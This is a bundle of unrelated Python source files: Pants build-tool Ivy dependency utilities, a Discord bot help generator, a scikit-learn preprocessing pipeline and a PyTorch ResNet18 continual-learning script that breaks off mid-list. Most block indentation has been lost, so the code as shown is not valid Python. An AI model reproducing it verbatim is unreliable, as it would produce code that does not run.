def _copy_ivy_reports(cls, workdir_report_paths_by_conf, confs, ivy_resolution_cache_dir, resolve_hash_name):
for conf in confs:
ivy_cache_report_path = IvyUtils.xml_report_path(ivy_resolution_cache_dir, resolve_hash_name,
conf)
workdir_report_path = workdir_report_paths_by_conf[conf]
try:
atomic_copy(ivy_cache_report_path,
workdir_report_path)
except IOError as e:
raise cls.IvyError('Failed to copy report into workdir from {} to {}: {}'
.format(ivy_cache_report_path, workdir_report_path, e))
@classmethod
def _exec_ivy(cls, ivy, confs, ivyxml, args, jvm_options, executor,
workunit_name, workunit_factory):
ivy = ivy or Bootstrapper.default_ivy()
ivy_args = ['-ivy', ivyxml]
ivy_args.append('-confs')
ivy_args.extend(confs)
ivy_args.extend(args)
ivy_jvm_options = list(jvm_options)
# Disable cache in File.getCanonicalPath(), makes Ivy work with -symlink option properly on ng.
ivy_jvm_options.append('-Dsun.io.useCanonCaches=false')
runner = ivy.runner(jvm_options=ivy_jvm_options, args=ivy_args, executor=executor)
try:
with ivy.resolution_lock:
result = execute_runner(runner, workunit_factory=workunit_factory,
workunit_name=workunit_name)
if result != 0:
raise IvyUtils.IvyError('Ivy returned {result}. cmd={cmd}'.format(result=result,
cmd=runner.cmd))
except runner.executor.Error as e:
raise IvyUtils.IvyError(e)
@classmethod
def construct_and_load_hardlink_map(cls, hardlink_dir, ivy_repository_cache_dir,
ivy_cache_classpath_filename, hardlink_classpath_filename):
# Make our actual classpath be hardlinks, so that the paths are uniform across systems.
# Note that we must do this even if we read the raw_target_classpath_file from the artifact
# cache. If we cache the target_classpath_file we won't know how to create the hardlinks.
with IvyUtils._hardlink_map_lock:
# A common dir for hardlinks into the ivy2 cache. This ensures that paths to jars
# in artifact-cached analysis files are consistent across systems.
# Note that we have one global, well-known hardlink dir, again so that paths are
# consistent across builds.
hardlink_map = cls._hardlink_cachepath(ivy_repository_cache_dir,
ivy_cache_classpath_filename,
hardlink_dir,
hardlink_classpath_filename)
classpath = cls._load_classpath_from_cachepath(hardlink_classpath_filename)
return classpath, hardlink_map
@classmethod
def _hardlink_cachepath(cls, ivy_repository_cache_dir, inpath, hardlink_dir, outpath):
"""hardlinks all paths listed in inpath that are under ivy_repository_cache_dir into hardlink_dir.
If there is an existing hardlink for a file under inpath, it is used rather than creating
a new hardlink. Preserves all other paths. Writes the resulting paths to outpath.
Returns a map of path -> hardlink to that path.
"""
safe_mkdir(hardlink_dir)
# The ivy_repository_cache_dir might itself be a hardlink. In this case, ivy may return paths that
# reference the realpath of the .jar file after it is resolved in the cache dir. To handle
# this case, add both the hardlink'ed path and the realpath to the jar to the hardlink map.
real_ivy_cache_dir = os.path.realpath(ivy_repository_cache_dir)
hardlink_map = OrderedDict()
inpaths = cls._load_classpath_from_cachepath(inpath)
paths = OrderedSet([os.path.realpath(path) for path in inpaths])
for path in paths:
if path.startswith(real_ivy_cache_dir):
hardlink_map[path] = os.path.join(hardlink_dir, os.path.relpath(path, real_ivy_cache_dir))
else:
# This path is outside the cache. We won't hardlink it.
hardlink_map[path] = path
# Create hardlinks for paths in the ivy cache dir.
for path, hardlink in six.iteritems(hardlink_map):
if path == hardlink:
# Skip paths that aren't going to be hardlinked.
continue
safe_mkdir(os.path.dirname(hardlink))
safe_hardlink_or_copy(path, hardlink)
# (re)create the classpath with all of the paths
with safe_open(outpath, 'w') as outfile:
outfile.write(':'.join(OrderedSet(hardlink_map.values())))
return dict(hardlink_map)
@classmethod
def xml_report_path(cls, resolution_cache_dir, resolve_hash_name, conf):
"""The path to the xml report ivy creates after a retrieve.
:API: public
    :param string resolution_cache_dir: The path of the ivy resolution cache dir used for resolves.
:param string resolve_hash_name: Hash from the Cache key from the VersionedTargetSet used for
resolution.
:param string conf: The ivy conf name (e.g. "default").
:returns: The report path.
:rtype: string
"""
return os.path.join(resolution_cache_dir, '{}-{}-{}.xml'.format(IvyUtils.INTERNAL_ORG_NAME,
resolve_hash_name, conf))
@classmethod
def parse_xml_report(cls, conf, path):
"""Parse the ivy xml report corresponding to the name passed to ivy.
:API: public
:param string conf: the ivy conf name (e.g. "default")
:param string path: The path to the ivy report file.
:returns: The info in the xml report.
:rtype: :class:`IvyInfo`
:raises: :class:`IvyResolveMappingError` if no report exists.
"""
if not os.path.exists(path):
raise cls.IvyResolveReportError('Missing expected ivy output file {}'.format(path))
logger.debug("Parsing ivy report {}".format(path))
ret = IvyInfo(conf)
etree = ET.parse(path)
doc = etree.getroot()
for module in doc.findall('dependencies/module'):
org = module.get('organisation')
name = module.get('name')
for revision in module.findall('revision'):
rev = revision.get('name')
callers = []
for caller in revision.findall('caller'):
callers.append(IvyModuleRef(caller.get('organisation'),
caller.get('name'),
caller.get('callerrev')))
for artifact in revision.findall('artifacts/artifact'):
classifier = artifact.get('extra-classifier')
ext = artifact.get('ext')
ivy_module_ref = IvyModuleRef(org=org, name=name, rev=rev,
classifier=classifier, ext=ext)
artifact_cache_path = artifact.get('location')
ivy_module = IvyModule(ivy_module_ref, artifact_cache_path, tuple(callers))
ret.add_module(ivy_module)
return ret
@classmethod
def generate_ivy(cls, targets, jars, excludes, ivyxml, confs, resolve_hash_name=None,
pinned_artifacts=None, jar_dep_manager=None):
if not resolve_hash_name:
resolve_hash_name = Target.maybe_readable_identify(targets)
return cls._generate_resolve_ivy(jars, excludes, ivyxml, confs, resolve_hash_name, pinned_artifacts,
jar_dep_manager)
@classmethod
def _generate_resolve_ivy(cls, jars, excludes, ivyxml, confs, resolve_hash_name, pinned_artifacts=None,
jar_dep_manager=None):
org = IvyUtils.INTERNAL_ORG_NAME
name = resolve_hash_name
extra_configurations = [conf for conf in confs if conf and conf != 'default']
jars_by_key = OrderedDict()
for jar in jars:
jars = jars_by_key.setdefault((jar.org, jar.name), [])
jars.append(jar)
manager = jar_dep_manager or JarDependencyManagement.global_instance()
artifact_set = PinnedJarArtifactSet(pinned_artifacts) # Copy, because we're modifying it.
for jars in jars_by_key.values():
for i, dep in enumerate(jars):
direct_coord = M2Coordinate.create(dep)
managed_coord = artifact_set[direct_coord]
if direct_coord.rev != managed_coord.rev:
# It may be necessary to actually change the version number of the jar we want to resolve
# here, because overrides do not apply directly (they are exclusively transitive). This is
# actually a good thing, because it gives us more control over what happens.
coord = manager.resolve_version_conflict(managed_coord, direct_coord, force=dep.force)
jars[i] = dep.copy(rev=coord.rev)
elif dep.force:
# If this dependency is marked as 'force' and there is no version conflict, use the normal
# pants behavior for 'force'.
artifact_set.put(direct_coord)
dependencies = [cls._generate_jar_template(jars) for jars in jars_by_key.values()]
# As it turns out force is not transitive - it only works for dependencies pants knows about
# directly (declared in BUILD files - present in generated ivy.xml). The user-level ivy docs
# don't make this clear [1], but the source code docs do (see isForce docs) [2]. I was able to
# edit the generated ivy.xml and use the override feature [3] though and that does work
# transitively as you'd hope.
#
# [1] http://ant.apache.org/ivy/history/2.3.0/settings/conflict-managers.html
# [2] https://svn.apache.org/repos/asf/ant/ivy/core/branches/2.3.0/
# src/java/org/apache/ivy/core/module/descriptor/DependencyDescriptor.java
# [3] http://ant.apache.org/ivy/history/2.3.0/ivyfile/override.html
overrides = [cls._generate_override_template(_coord) for _coord in artifact_set]
excludes = [cls._generate_exclude_template(exclude) for exclude in excludes]
template_data = TemplateData(
org=org,
module=name,
extra_configurations=extra_configurations,
dependencies=dependencies,
excludes=excludes,
overrides=overrides)
template_relpath = os.path.join('templates', 'ivy_utils', 'ivy.xml.mustache')
cls._write_ivy_xml_file(ivyxml, template_data, template_relpath)
@classmethod
def generate_fetch_ivy(cls, jars, ivyxml, confs, resolve_hash_name):
"""Generates an ivy xml with all jars marked as intransitive using the all conflict manager."""
org = IvyUtils.INTERNAL_ORG_NAME
name = resolve_hash_name
extra_configurations = [conf for conf in confs if conf and conf != 'default']
# Use org name _and_ rev so that we can have dependencies with different versions. This will
# allow for batching fetching if we want to do that.
jars_by_key = OrderedDict()
for jar in jars:
jars_by_key.setdefault((jar.org, jar.name, jar.rev), []).append(jar)
dependencies = [cls._generate_fetch_jar_template(_jars) for _jars in jars_by_key.values()]
template_data = TemplateData(org=org,
module=name,
extra_configurations=extra_configurations,
dependencies=dependencies)
template_relpath = os.path.join('templates', 'ivy_utils', 'ivy_fetch.xml.mustache')
cls._write_ivy_xml_file(ivyxml, template_data, template_relpath)
@classmethod
def _write_ivy_xml_file(cls, ivyxml, template_data, template_relpath):
template_text = pkgutil.get_data(__name__, template_relpath).decode('utf-8')
generator = Generator(template_text, lib=template_data)
with safe_open(ivyxml, 'w') as output:
generator.write(output)
@classmethod
def calculate_classpath(cls, targets):
"""Creates a consistent classpath and list of excludes for the passed targets.
It also modifies the JarDependency objects' excludes to contain all the jars excluded by
provides.
:param iterable targets: List of targets to collect JarDependencies and excludes from.
:returns: A pair of a list of JarDependencies, and a set of excludes to apply globally.
"""
jars = OrderedDict()
global_excludes = set()
provide_excludes = set()
targets_processed = set()
# Support the ivy force concept when we sanely can for internal dep conflicts.
# TODO(John Sirois): Consider supporting / implementing the configured ivy revision picking
# strategy generally.
def add_jar(jar):
# TODO(John Sirois): Maven allows for depending on an artifact at one rev and one of its
      # attachments (classified artifacts) at another. Ivy does not allow this; the dependency
      # can carry only 1 rev, and that rev hosts multiple artifacts. This conflict
# resolution happens at the classifier level, allowing skew in a
# multi-artifact/multi-classifier dependency. We only find out about the skew later in
      # `_generate_jar_template` below, which will blow up with a conflict. Move this logic closer
      # together to get a clearer validate, then emit ivy.xml, then resolve flow instead of the
# spread-out validations happening here.
# See: https://github.com/pantsbuild/pants/issues/2239
coordinate = (jar.org, jar.name, jar.classifier)
existing = jars.get(coordinate)
jars[coordinate] = jar if not existing else cls._resolve_conflict(existing=existing,
proposed=jar)
def collect_jars(target):
if isinstance(target, JarLibrary):
for jar in target.jar_dependencies:
add_jar(jar)
def collect_excludes(target):
target_excludes = target.payload.get_field_value('excludes')
if target_excludes:
global_excludes.update(target_excludes)
def collect_provide_excludes(target):
if not (isinstance(target, ExportableJvmLibrary) and target.provides):
return
logger.debug('Automatically excluding jar {}.{}, which is provided by {}'.format(
target.provides.org, target.provides.name, target))
provide_excludes.add(Exclude(org=target.provides.org, name=target.provides.name))
def collect_elements(target):
targets_processed.add(target)
collect_jars(target)
collect_excludes(target)
collect_provide_excludes(target)
for target in targets:
target.walk(collect_elements, predicate=lambda target: target not in targets_processed)
# If a source dep is exported (ie, has a provides clause), it should always override
# remote/binary versions of itself, ie "round trip" dependencies.
# TODO: Move back to applying provides excludes as target-level excludes when they are no
# longer global.
if provide_excludes:
additional_excludes = tuple(provide_excludes)
new_jars = OrderedDict()
for coordinate, jar in jars.items():
new_jars[coordinate] = jar.copy(excludes=jar.excludes + additional_excludes)
jars = new_jars
return list(jars.values()), global_excludes
@classmethod
def _resolve_conflict(cls, existing, proposed):
if existing.rev is None:
return proposed
if proposed.rev is None:
return existing
if proposed == existing:
if proposed.force:
return proposed
return existing
elif existing.force and proposed.force:
raise cls.IvyResolveConflictingDepsError('Cannot force {}#{};{} to both rev {} and {}'.format(
proposed.org, proposed.name, proposed.classifier or '', existing.rev, proposed.rev
))
elif existing.force:
logger.debug('Ignoring rev {} for {}#{};{} already forced to {}'.format(
proposed.rev, proposed.org, proposed.name, proposed.classifier or '', existing.rev
))
return existing
elif proposed.force:
logger.debug('Forcing {}#{};{} from {} to {}'.format(
proposed.org, proposed.name, proposed.classifier or '', existing.rev, proposed.rev
))
return proposed
else:
if Revision.lenient(proposed.rev) > Revision.lenient(existing.rev):
logger.debug('Upgrading {}#{};{} from rev {} to {}'.format(
proposed.org, proposed.name, proposed.classifier or '', existing.rev, proposed.rev,
))
return proposed
else:
return existing
@classmethod
def _generate_jar_template(cls, jars):
global_dep_attributes = set(Dependency(org=jar.org,
name=jar.name,
rev=jar.rev,
mutable=jar.mutable,
force=jar.force,
transitive=jar.transitive)
for jar in jars)
if len(global_dep_attributes) != 1:
# TODO: Need to provide information about where these came from - could be
# far-flung JarLibrary targets. The jars here were collected from targets via
# `calculate_classpath` above so executing this step there instead may make more
# sense.
conflicting_dependencies = sorted(str(g) for g in global_dep_attributes)
raise cls.IvyResolveConflictingDepsError('Found conflicting dependencies:\n\t{}'
.format('\n\t'.join(conflicting_dependencies)))
jar_attributes = global_dep_attributes.pop()
excludes = set()
for jar in jars:
excludes.update(jar.excludes)
any_have_url = False
artifacts = OrderedDict()
for jar in jars:
ext = jar.ext
url = jar.get_url()
if url:
any_have_url = True
classifier = jar.classifier
artifact = Artifact(name=jar.name,
type_=ext or 'jar',
ext=ext,
url=url,
classifier=classifier)
artifacts[(ext, url, classifier)] = artifact
template = TemplateData(
org=jar_attributes.org,
module=jar_attributes.name,
version=jar_attributes.rev,
mutable=jar_attributes.mutable,
force=jar_attributes.force,
transitive=jar_attributes.transitive,
artifacts=list(artifacts.values()),
any_have_url=any_have_url,
excludes=[cls._generate_exclude_template(exclude) for exclude in excludes])
return template
@classmethod
def _generate_fetch_jar_template(cls, jars):
global_dep_attributes = set(Dependency(org=jar.org,
name=jar.name,
rev=jar.rev,
transitive=False,
mutable=jar.mutable,
force=True)
for jar in jars)
if len(global_dep_attributes) != 1:
# If we batch fetches and assume conflict manager all, we could ignore these.
# Leaving this here for now.
conflicting_dependencies = sorted(str(g) for g in global_dep_attributes)
raise cls.IvyResolveConflictingDepsError('Found conflicting dependencies:\n\t{}'
.format('\n\t'.join(conflicting_dependencies)))
jar_attributes = global_dep_attributes.pop()
any_have_url = False
artifacts = OrderedDict()
for jar in jars:
ext = jar.ext
url = jar.get_url()
if url:
any_have_url = True
classifier = jar.classifier
artifact = Artifact(name=jar.name,
type_=ext or 'jar',
ext=ext,
url=url,
classifier=classifier)
artifacts[(ext, url, classifier)] = artifact
template = TemplateData(
org=jar_attributes.org,
module=jar_attributes.name,
version=jar_attributes.rev,
mutable=jar_attributes.mutable,
artifacts=list(artifacts.values()),
any_have_url=any_have_url,
excludes=[])
return template
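# Illustrative sketch (not part of the original module): the report naming scheme produced by
# IvyUtils.xml_report_path. The cache dir and resolve hash below are placeholders.
def _demo_xml_report_path():
  # -> '/tmp/ivy-resolution-cache/internal-deadbeef-default.xml'
  return IvyUtils.xml_report_path('/tmp/ivy-resolution-cache', 'deadbeef', 'default')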
|
the-stack_106_16838
|
from logging import WARN
from discord import Embed
from discord.ext.commands import Group
from yaml import YAMLError, safe_load
from core.api import split_camel
def __resolve_alias(cmd):
return set([cmd.name] + cmd.aliases)
def get_help(bot) -> tuple:
"""
    Return the general help Embed together with per-command help Embeds.
    :param bot: the Yasen instance.
    :return: a tuple of (general help Embed, dict mapping command names to their help Embeds)
"""
from bot import __title__ as name
prefix = bot.prefix
description = f'For detailed help please use {prefix}help [command_name]'
embed = Embed(colour=bot.colour, description=description)
embed.set_author(name=f'{name} Help', icon_url=bot.user.avatar_url)
cog_cmd = {}
all_help = {}
for command in bot.commands.values():
_name = command.name
for n in __resolve_alias(command):
all_help[n] = single_help(bot, command, _name)
cog_name = ' '.join(split_camel(command.cog_name) + ['Commands'])
if cog_name not in cog_cmd:
cog_cmd[cog_name] = []
cog_cmd[cog_name].append(f'`{_name}`')
if isinstance(command, Group):
for sub in command.commands.values():
_child_name = sub.name
full_name = f'{_name} {_child_name}'
all_help[full_name] = single_help(bot, sub, full_name)
cog_cmd[cog_name].append(full_name)
for key in sorted(cog_cmd.keys()):
embed.add_field(
name=key, value=', '.join(set(cog_cmd[key])), inline=False
)
return embed, all_help
def single_help(bot, cmd, cmd_name) -> Embed:
"""
    Generate a help Embed for a given command.
    :param bot: the Yasen instance.
    :param cmd: the command to generate help for.
    :param cmd_name: the full name of the command.
    :return: the embed object for the given command.
"""
doc = cmd.help
try:
help_dict = safe_load(doc)
except (YAMLError, AttributeError) as e:
bot.logger.log(WARN, str(e))
return Embed(colour=bot.colour, description=doc)
else:
embed = Embed(
colour=bot.colour, description=help_dict.pop('Description')
)
embed.set_author(name=cmd_name, icon_url=bot.user.avatar_url)
if cmd.aliases:
embed.add_field(name='Aliases', value=f'`{", ".join(cmd.aliases)}`')
for key, val in help_dict.items():
try:
val = val.format(prefix=bot.prefix)
except KeyError:
val = val.replace('{prefix}', bot.prefix)
embed.add_field(name=key, value=val, inline=False)
return embed
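# Illustrative sketch (not part of the original module): the YAML-shaped docstring that
# single_help expects on a command. The command and its fields are invented; the only
# structural requirement exercised here is a top-level 'Description' key plus extra fields.
EXAMPLE_COMMAND_DOC = """
Description: Greet a member of the server.
Usage: "`{prefix}greet [member]`"
"""
def _demo_parse_command_doc():
    parsed = safe_load(EXAMPLE_COMMAND_DOC)
    description = parsed.pop('Description')
    return description, parsed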
|
the-stack_106_16840
|
#==============================================================================
# Import packages
#==============================================================================
import numpy as np
import pandas as pd
# Utilities
from sklearn.utils import resample
# Transformer to select a subset of the Pandas DataFrame columns
from sklearn.base import BaseEstimator, TransformerMixin
# Pipeline
from sklearn.pipeline import Pipeline
from sklearn.pipeline import FeatureUnion
# Data preprocessing
from sklearn.preprocessing import Imputer
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import PolynomialFeatures
# Feature selection
from sklearn.feature_selection import VarianceThreshold
#==============================================================================
# Custom transformer classes
#==============================================================================
# Class to select columns
class FeatureSelector(BaseEstimator, TransformerMixin):
def __init__(self, attribute_names):
self.attribute_names = attribute_names
    def fit(self, x, y=None):
return self
def transform(self, x):
return x[self.attribute_names].values
# Class to impute textual category
class ImputerTextualCategory(BaseEstimator, TransformerMixin):
def __init__(self):
pass
def fit(self, df, y=None):
return self
def transform(self, x):
return pd.DataFrame(x).apply(lambda x: x.fillna(x.value_counts().index[0]))
# Class to encode labels across multiple columns
class MultiColumnLabelEncoder(BaseEstimator, TransformerMixin):
def __init__(self, astype=int):
self.astype = astype
def fit(self, x, y=None):
return self
def transform(self, x, y=None):
if self.astype == int:
return pd.DataFrame(x).apply(LabelEncoder().fit_transform)
else:
return pd.DataFrame(x).apply(LabelEncoder().fit_transform).astype(str)
# Class for one-hot encoding of textual categorical values and optionally
# drop the first dummy feature (if multi-collinearity is a concern)
class GetDummies(BaseEstimator, TransformerMixin):
def __init__(self, drop_first=False):
self.drop_first = drop_first
def fit(self, x, y=None):
return self
def transform(self, x):
return pd.get_dummies(x, drop_first=self.drop_first)
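# Illustrative sketch (not part of the original script): chaining the custom transformers on a
# tiny hand-made frame. Column names and values are invented for demonstration only.
def _demo_custom_transformers():
    toy = pd.DataFrame({'colour': ['red', 'blue', None], 'size': ['S', None, 'L']})
    imputed = ImputerTextualCategory().fit_transform(toy)                  # fill gaps with the mode
    encoded = MultiColumnLabelEncoder(astype=str).fit_transform(imputed)   # labels -> '0', '1', ...
    return GetDummies(drop_first=True).fit_transform(encoded)              # n-1 dummies per feature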
#==============================================================================
# Initialization Settings
#==============================================================================
ID = 'id'
Y = 'y'
DIR = "input"
DATAFILE = "{0}/data_example.csv".format(DIR)
NTRAINROWS = None # Number of rows of data file to read; None reads all rows
UPSAMPLEPCT = .4 # Percent of samples to have positive class; 0 <= pct < 1
SEED = 42 # Seed state for reproducibility
VARTHRESHOLD = .001 # Minimum variability allowed for features
#==============================================================================
# Data import
#==============================================================================
df = pd.read_csv(DATAFILE, index_col=ID, header=0, nrows=NTRAINROWS)
# Separate majority and minority classes
df_majority = df[df[Y]==0]
df_minority = df[df[Y]==1]
# Upsample minority class with replacement
df_minority_sampled = resample(df_minority,
replace=True,
n_samples=int(UPSAMPLEPCT*df_majority.shape[0]/(1-UPSAMPLEPCT)),
random_state=SEED)
# Combine majority class with upsampled minority class
df_sampled = pd.concat([df_majority, df_minority_sampled])
# Shuffle all the samples
df_sampled = resample(df_sampled, replace=False, random_state=SEED)
# Separate y and X variables
y = df_sampled[Y]
X = df_sampled.loc[:, df_sampled.columns != Y]
#==============================================================================
# Preprocessing pipeline
#==============================================================================
# Select features: binary ('bin'), numerical categorical ('numcat'),
# textual categorical ('strcat'), and numerical ('num').
#
# bin: 1. these are features that have two categories labeled either 1 or 0
# === 2. we want to keep the columns as they are
#
# numcat: 1. these are features that have at least three numerical categories
# ====== 2. we want to transform them into dummy variables
#
# txtcat: 1. these are features that have at least three textual categories
# ====== 2. we want to transform them into dummy variables
#
# num: 1. these features that are numerical such as integers and floats
# === 2. we want to normalize these values
bin_features = [f for f in X.columns if f[3:len(f)] == 'bin']
numcat_features = [f for f in X.columns if f[3:len(f)] == 'numcat']
txtcat_features = [f for f in X.columns if f[3:len(f)] == 'txtcat']
num_features = [f for f in X.columns if f[3:len(f)] == 'num']
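# Illustrative sketch (not part of the original script): the column-naming convention the
# suffix checks above rely on. The names are invented; only the characters from position 3
# onward are inspected, e.g. '01_bin' -> 'bin'.
def _demo_feature_suffix_bucketing():
    example_columns = ['01_bin', '02_numcat', '03_txtcat', '04_num']
    return {c: c[3:] for c in example_columns}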
# 1. Select features
# 2. Impute missing values with the median
bin_pipeline = Pipeline([
('selector', FeatureSelector(bin_features)),
('imputer', Imputer(missing_values=np.nan, strategy='median', axis=0)),
('threshold', VarianceThreshold(VARTHRESHOLD)),
])
# 1. Select features
# 2. Impute missing values with the median
# 3. Encode each feature and set the type to string so that the GetDummies class
# (which uses pandas.get_dummies) can transform labels into dummy variables
# 4. Create one-hot encoding for each feature and (due to multi-collinearity concerns)
# remove the first dummy feature to retain n-1 dummy features
numcat_pipeline = Pipeline([
('selector', FeatureSelector(np.array(numcat_features))),
('imputer', Imputer(missing_values=np.nan, strategy='median', axis=0)),
('labelencoder', MultiColumnLabelEncoder(astype=str)),
('getdummies', GetDummies(drop_first=True)),
('threshold', VarianceThreshold(VARTHRESHOLD)),
])
# 1. Select features
# 2. Impute missing values with the most frequent
# 3. Create one-hot encoding for each feature and (for multi-collinearity concerns)
# remove the first dummy feature to retain n-1 dummy features
txtcat_pipeline = Pipeline([
('selector', FeatureSelector(np.array(txtcat_features))),
('imputer', ImputerTextualCategory()),
('getdummies', GetDummies(drop_first=True)),
('threshold', VarianceThreshold(VARTHRESHOLD)),
])
# 1. Select features
# 2. Impute missing values with the mean
# 3. Scale the values using standard normalization: (x-mean(x))/stdev(x)
num_pipeline = Pipeline([
('selector', FeatureSelector(num_features)),
('imputer', Imputer(missing_values=np.nan, strategy='mean', axis=0)),
('poly', PolynomialFeatures(2, interaction_only=False)),
('normalizer', StandardScaler()),
('threshold', VarianceThreshold(VARTHRESHOLD)),
])
# Combine all pipelines into a single pipeline
full_pipeline = FeatureUnion(transformer_list=[
("bin_pipeline", bin_pipeline),
("numcat_pipeline", numcat_pipeline),
("txtcat_pipeline", txtcat_pipeline),
("num_pipeline", num_pipeline),
])
# Execute entire pipeline. If the output is a sparse matrix,
# then convert it to a dense matrix using the toarray method.
try:
X = pd.DataFrame(full_pipeline.fit_transform(X).toarray())
except AttributeError:
X = pd.DataFrame(full_pipeline.fit_transform(X))
#==============================================================================
# The End
#==============================================================================
|
the-stack_106_16842
|
import torch
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.functional import relu, avg_pool2d
from torch.autograd import Variable
import torchvision
from torchvision import datasets, transforms
import os
import os.path
from collections import OrderedDict
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sn
import pandas as pd
import random
import pdb
import argparse,time
import math
from copy import deepcopy
## Define ResNet18 model
def compute_conv_output_size(Lin,kernel_size,stride=1,padding=0,dilation=1):
return int(np.floor((Lin+2*padding-dilation*(kernel_size-1)-1)/float(stride)+1))
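# Illustrative sketch (not part of the original code): the spatial bookkeeping done by
# compute_conv_output_size for the 32x32 inputs used below. A 3x3 convolution with padding 1
# keeps the size at stride 1 and halves it at stride 2.
def _demo_conv_output_size():
    same = compute_conv_output_size(32, kernel_size=3, stride=1, padding=1)    # -> 32
    halved = compute_conv_output_size(32, kernel_size=3, stride=2, padding=1)  # -> 16
    return same, halved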
def conv3x3(in_planes, out_planes, stride=1):
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
def conv7x7(in_planes, out_planes, stride=1):
return nn.Conv2d(in_planes, out_planes, kernel_size=7, stride=stride,
padding=1, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(in_planes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes, track_running_stats=False)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes, track_running_stats=False)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion * planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1,
stride=stride, bias=False),
nn.BatchNorm2d(self.expansion * planes, track_running_stats=False)
)
self.act = OrderedDict()
self.count = 0
def forward(self, x):
self.count = self.count % 2
self.act['conv_{}'.format(self.count)] = x
self.count +=1
out = relu(self.bn1(self.conv1(x)))
self.count = self.count % 2
self.act['conv_{}'.format(self.count)] = out
self.count +=1
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, num_blocks, taskcla, nf):
super(ResNet, self).__init__()
self.in_planes = nf
self.conv1 = conv3x3(3, nf * 1, 1)
self.bn1 = nn.BatchNorm2d(nf * 1, track_running_stats=False)
self.layer1 = self._make_layer(block, nf * 1, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, nf * 2, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, nf * 4, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, nf * 8, num_blocks[3], stride=2)
self.taskcla = taskcla
self.linear=torch.nn.ModuleList()
for t, n in self.taskcla:
self.linear.append(nn.Linear(nf * 8 * block.expansion * 4, n, bias=False))
self.act = OrderedDict()
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1] * (num_blocks - 1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
bsz = x.size(0)
self.act['conv_in'] = x.view(bsz, 3, 32, 32)
out = relu(self.bn1(self.conv1(x.view(bsz, 3, 32, 32))))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = avg_pool2d(out, 2)
out = out.view(out.size(0), -1)
y=[]
for t,i in self.taskcla:
y.append(self.linear[t](out))
return y
def ResNet18(taskcla, nf=32):
return ResNet(BasicBlock, [2, 2, 2, 2], taskcla, nf)
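# Illustrative sketch (not part of the original code): building the multi-headed ResNet18 and
# checking output shapes. The task configuration (two 10-way tasks) and batch size are invented.
def _demo_resnet18_forward():
    taskcla = [(0, 10), (1, 10)]
    net = ResNet18(taskcla, nf=20)
    outputs = net(torch.randn(4, 3, 32, 32))
    # One head per task, each producing (batch, n_classes) logits.
    return [o.shape for o in outputs]  # [torch.Size([4, 10]), torch.Size([4, 10])]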
def get_model(model):
return deepcopy(model.state_dict())
def set_model_(model,state_dict):
model.load_state_dict(deepcopy(state_dict))
return
def adjust_learning_rate(optimizer, epoch, args):
for param_group in optimizer.param_groups:
if (epoch ==1):
param_group['lr']=args.lr
else:
param_group['lr'] /= args.lr_factor
def train(args, model, device, x,y, optimizer,criterion, task_id):
model.train()
r=np.arange(x.size(0))
np.random.shuffle(r)
r=torch.LongTensor(r).to(device)
# Loop batches
for i in range(0,len(r),args.batch_size_train):
if i+args.batch_size_train<=len(r): b=r[i:i+args.batch_size_train]
else: b=r[i:]
data = x[b]
data, target = data.to(device), y[b].to(device)
optimizer.zero_grad()
output = model(data)
loss = criterion(output[task_id], target)
loss.backward()
optimizer.step()
def train_projected(args,model,device,x,y,optimizer,criterion,feature_mat,task_id):
model.train()
r=np.arange(x.size(0))
np.random.shuffle(r)
r=torch.LongTensor(r).to(device)
# Loop batches
for i in range(0,len(r),args.batch_size_train):
if i+args.batch_size_train<=len(r): b=r[i:i+args.batch_size_train]
else: b=r[i:]
data = x[b]
data, target = data.to(device), y[b].to(device)
optimizer.zero_grad()
output = model(data)
loss = criterion(output[task_id], target)
loss.backward()
# Gradient Projections
kk = 0
for k, (m,params) in enumerate(model.named_parameters()):
if len(params.size())==4:
sz = params.grad.data.size(0)
params.grad.data = params.grad.data - torch.mm(params.grad.data.view(sz,-1),\
feature_mat[kk]).view(params.size())
kk+=1
elif len(params.size())==1 and task_id !=0:
params.grad.data.fill_(0)
optimizer.step()
def test(args, model, device, x, y, criterion, task_id):
model.eval()
total_loss = 0
total_num = 0
correct = 0
r=np.arange(x.size(0))
np.random.shuffle(r)
r=torch.LongTensor(r).to(device)
with torch.no_grad():
# Loop batches
for i in range(0,len(r),args.batch_size_test):
if i+args.batch_size_test<=len(r): b=r[i:i+args.batch_size_test]
else: b=r[i:]
data = x[b]
data, target = data.to(device), y[b].to(device)
output = model(data)
loss = criterion(output[task_id], target)
pred = output[task_id].argmax(dim=1, keepdim=True)
correct += pred.eq(target.view_as(pred)).sum().item()
total_loss += loss.data.cpu().numpy().item()*len(b)
total_num += len(b)
acc = 100. * correct / total_num
final_loss = total_loss / total_num
return final_loss, acc
def get_representation_matrix_ResNet18 (net, device, x, y=None):
# Collect activations by forward pass
net.eval()
r=np.arange(x.size(0))
np.random.shuffle(r)
r=torch.LongTensor(r).to(device)
b=r[0:100] # ns=100 examples
example_data = x[b]
example_data = example_data.to(device)
example_out = net(example_data)
act_list =[]
act_list.extend([net.act['conv_in'],
net.layer1[0].act['conv_0'], net.layer1[0].act['conv_1'], net.layer1[1].act['conv_0'], net.layer1[1].act['conv_1'],
net.layer2[0].act['conv_0'], net.layer2[0].act['conv_1'], net.layer2[1].act['conv_0'], net.layer2[1].act['conv_1'],
net.layer3[0].act['conv_0'], net.layer3[0].act['conv_1'], net.layer3[1].act['conv_0'], net.layer3[1].act['conv_1'],
